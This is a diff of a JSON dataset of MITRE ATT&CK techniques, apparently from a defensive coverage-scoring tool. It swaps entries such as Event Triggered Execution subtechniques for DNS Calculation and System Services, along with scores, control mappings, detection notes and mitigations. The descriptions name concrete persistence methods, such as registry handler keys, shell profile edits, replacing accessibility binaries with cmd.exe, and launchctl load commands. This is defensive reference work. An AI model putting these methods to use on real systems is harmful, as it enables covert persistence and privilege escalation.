+        "cumulative_score": 0.20476190476190478,
+        "adjusted_score": 0.20476190476190478,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
-            "2.3",
-            "2.5",
-            "3.3",
-            "4.1",
-            "4.7",
-            "5.3",
-            "5.4",
-            "6.1",
-            "6.2",
-            "6.8",
-            "18.3",
-            "18.5"
+            "9.2",
+            "13.3",
+            "13.8"
         ],
         "nist_controls": [
-            "AC-17",
-            "AC-2",
-            "AC-3",
-            "AC-5",
-            "AC-6",
+            "AC-4",
             "CA-7",
-            "CA-8",
-            "CM-11",
-            "CM-2",
-            "CM-3",
-            "CM-5",
-            "CM-6",
-            "CM-7",
-            "IA-2",
-            "IA-4",
-            "RA-5",
-            "SA-22",
-            "SI-16",
+            "SC-20",
+            "SC-21",
+            "SC-22",
+            "SC-7",
             "SI-3",
-            "SI-4",
-            "SI-7"
+            "SI-4"
         ],
-        "process_coverage": true,
-        "network_coverage": false,
-        "file_coverage": true,
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": true,
-        "actionability_score": {
-            "combined_score": 0.5666666666666667,
-            "mitigation_score": 0.6,
-            "detection_score": 0.53
-        },
-        "choke_point_score": 0.2,
-        "prevalence_score": 1
+        "hardware_coverage": false
     },
     {
-        "tid": "T1546",
-        "name": "Event Triggered Execution",
-        "description": "Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. \n\nAdversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)\n\nSince the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. ",
-        "url": "https://attack.mitre.org/techniques/T1546",
+        "tid": "T1568.003",
+        "name": "Dynamic Resolution: DNS Calculation",
+        "description": "Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)\n\nOne implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)",
+        "url": "https://attack.mitre.org/techniques/T1568/003",
         "tactics": [
-            "Persistence",
-            "Privilege Escalation"
+            "Command And Control"
         ],
-        "detection": "Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition of abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network. Also look for changes that do not line up with updates, patches, or other planned administrative activity. \n\nThese mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. \n\nMonitor for processes, API/System calls, and other common ways of manipulating these event repositories. \n\nTools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.  \n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement. ",
+        "detection": "Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.",
         "platforms": [
             "Linux",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "File: File Creation",
-            "File: File Metadata",
-            "File: File Modification",
-            "Module: Module Load",
-            "Process: Process Creation",
-            "WMI: WMI Creation",
-            "Windows Registry: Windows Registry Key Modification"
+            "Network Traffic: Network Traffic Content"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1546.001",
-                "name": "Event Triggered Execution: Change Default File Association",
-                "url": "https://attack.mitre.org/techniques/T1546/001",
-                "description": "Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n\nSystem file associations are listed under HKEY_CLASSES_ROOT\\.[extension], for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command. For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)",
-                "detection": "Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process.\n\nUser file association preferences are stored under  [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts and override associations configured under [HKEY_CLASSES_ROOT]. Changes to a user's preference will occur under this entry's subkeys.\n\nAlso look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.",
-                "mitigations": []
-            },
-            {
-                "tid": "T1546.002",
-                "name": "Event Triggered Execution: Screensaver",
-                "url": "https://attack.mitre.org/techniques/T1546/002",
-                "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\\Windows\\System32\\, and C:\\Windows\\sysWOW64\\  on 64-bit Windows systems, along with screensavers included with base Windows installations.\n\nThe following screensaver settings are stored in the Registry (HKCU\\Control Panel\\Desktop\\) and could be manipulated to achieve persistence:\n\n* SCRNSAVE.exe - set to malicious PE path\n* ScreenSaveActive - set to '1' to enable the screensaver\n* ScreenSaverIsSecure - set to '0' to not require a password to unlock\n* ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed\n\nAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)",
-                "detection": "Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.\n\nTools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.",
-                "mitigations": [
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    }
-                ]
-            },
-            {
-                "tid": "T1546.003",
-                "name": "Event Triggered Execution: Windows Management Instrumentation Event Subscription",
-                "url": "https://attack.mitre.org/techniques/T1546/003",
-                "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015)\n\nAdversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)\n\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.",
-                "detection": "Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding events. Event ID 5861 is logged on Windows 10 systems when new EventFilterToConsumerBinding events are created.(Citation: Elastic - Hunting for Persistence Part 1)\n\nMonitor processes and command-line arguments that can be used to register WMI persistence, such as the  Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).",
-                "mitigations": [
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
-            },
-            {
-                "tid": "T1546.004",
-                "name": "Event Triggered Execution: Unix Shell Configuration Modification",
-                "url": "https://attack.mitre.org/techniques/T1546/004",
-                "description": "Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. \n\nAdversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution. Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session. \n\nFor macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.",
-                "detection": "While users may customize their shell profile files, there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.\n\nMonitor for changes to /etc/profile and /etc/profile.d, these files should only be modified by system administrators. MacOS users can leverage Endpoint Security Framework file events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor most Linux and macOS systems, a list of file paths for valid shell options available on a system are located in the /etc/shells file.\n",
-                "mitigations": [
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    }
-                ]
-            },
-            {
-                "tid": "T1546.005",
-                "name": "Event Triggered Execution: Trap",
-                "url": "https://attack.mitre.org/techniques/T1546/005",
-                "description": "Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d.\n\nAdversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where \"command list\" will be executed when \"signals\" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)",
-                "detection": "Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.",
-                "mitigations": []
-            },
-            {
-                "tid": "T1546.006",
-                "name": "Event Triggered Execution: LC_LOAD_DYLIB Addition",
-                "url": "https://attack.mitre.org/techniques/T1546/006",
-                "description": "Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.\n\nAdversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X)",
-                "detection": "Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1045",
-                        "name": "Code Signing",
-                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
-                        "url": "https://attack.mitre.org/mitigations/M1045"
-                    },
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    }
-                ]
-            },
-            {
-                "tid": "T1546.007",
-                "name": "Event Triggered Execution: Netsh Helper DLL",
-                "url": "https://attack.mitre.org/techniques/T1546/007",
-                "description": "Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\\SOFTWARE\\Microsoft\\Netsh.\n\nAdversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)",
-                "detection": "It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\\SOFTWARE\\Microsoft\\Netsh registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)",
-                "mitigations": []
-            },
-            {
-                "tid": "T1546.008",
-                "name": "Event Triggered Execution: Accessibility Features",
-                "url": "https://attack.mitre.org/techniques/T1546/008",
-                "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nTwo common accessibility programs are C:\\Windows\\System32\\sethc.exe, launched when the shift key is pressed five times and C:\\Windows\\System32\\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as \"sticky keys\", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)\n\nDepending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.\n\nFor simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\\Windows\\System32\\utilman.exe) may be replaced with \"cmd.exe\" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nOther accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)\n\n* On-Screen Keyboard: C:\\Windows\\System32\\osk.exe\n* Magnifier: C:\\Windows\\System32\\Magnify.exe\n* Narrator: C:\\Windows\\System32\\Narrator.exe\n* Display Switcher: C:\\Windows\\System32\\DisplaySwitch.exe\n* App Switcher: C:\\Windows\\System32\\AtBroker.exe",
-                "detection": "Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options.",
-                "mitigations": [
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    },
-                    {
-                        "mid": "M1035",
-                        "name": "Limit Access to Resource Over Network",
-                        "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1035"
-                    },
-                    {
-                        "mid": "M1028",
-                        "name": "Operating System Configuration",
-                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1028"
-                    }
-                ]
-            },
-            {
-                "tid": "T1546.009",
-                "name": "Event Triggered Execution: AppCert DLLs",
-                "url": "https://attack.mitre.org/techniques/T1546/009",
-                "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\ are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Elastic Process Injection July 2017)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity. ",
-                "detection": "Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017) \n\nTools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)\n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.",
-                "mitigations": [
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    }
-                ]
-            },
+        "is_subtechnique": true,
+        "supertechnique": "T1568",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.15714285714285714,
+        "adjusted_score": 0.15714285714285714,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1569",
+        "name": "System Services",
+        "description": "Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.",
+        "url": "https://attack.mitre.org/techniques/T1569",
+        "tactics": [
+            "Execution"
+        ],
+        "detection": "Monitor for command line invocations of tools capable of modifying services that doesn’t correspond to normal usage patterns and known software, patch cycles, etc. Also monitor for changes to executables and other files associated with services. Changes to Windows services may also be reflected in the Registry.",
+        "platforms": [
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Modification",
+            "Process: Process Creation",
+            "Service: Service Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
             {
-                "tid": "T1546.010",
-                "name": "Event Triggered Execution: AppInit DLLs",
-                "url": "https://attack.mitre.org/techniques/T1546/010",
-                "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017)\n\nSimilar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity. \n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)",
-                "detection": "Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017)\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns) \n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.",
+                "tid": "T1569.001",
+                "name": "System Services: Launchctl",
+                "url": "https://attack.mitre.org/techniques/T1569/001",
+                "description": "Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)\n\nAdversaries use launchctl to execute commands and programs as [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Common subcommands include: launchctl load,launchctl unload, and launchctl start. Adversaries can use scripts or manually run the commands launchctl load -w \"%s/Library/LaunchAgents/%s\" or /bin/launchctl load to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)\n",
+                "detection": "Every Launch Agent and Launch Daemon must have a corresponding plist file on disk which can be monitored. Monitor for recently modified or created plist files with a significant change to the executable path executed with the command-line launchctl command. Plist files are located in the root, system, and users /Library/LaunchAgents or /Library/LaunchDaemons folders. \n\nMonitor command-line execution of the launchctl command immediately followed by abnormal network connections. [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s with executable paths pointing to /tmp and /Shared folders locations are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure the services are unloaded prior to deleting plist files.",
                 "mitigations": [
                     {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    },
-                    {
-                        "mid": "M1051",
-                        "name": "Update Software",
-                        "description": "Perform regular software updates to mitigate exploitation risk.",
-                        "url": "https://attack.mitre.org/mitigations/M1051"
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
             },
             {
-                "tid": "T1546.011",
-                "name": "Event Triggered Execution: Application Shimming",
-                "url": "https://attack.mitre.org/techniques/T1546/011",
-                "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)\n\nWithin the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.",
-                "detection": "There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):\n\n* Shim-Process-Scanner - checks memory of every running process for any shim flags\n* Shim-Detector-Lite - detects installation of custom shim databases\n* Shim-Guard - monitors registry for any shim installations\n* ShimScanner - forensic tool to find active shims in memory\n* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)\n\nMonitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.",
+                "tid": "T1569.002",
+                "name": "System Services: Service Execution",
+                "url": "https://attack.mitre.org/techniques/T1569/002",
+                "description": "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039).\n\n[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and sc.exe can accept remote servers as arguments and may be used to conduct remote execution.\n\nAdversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.",
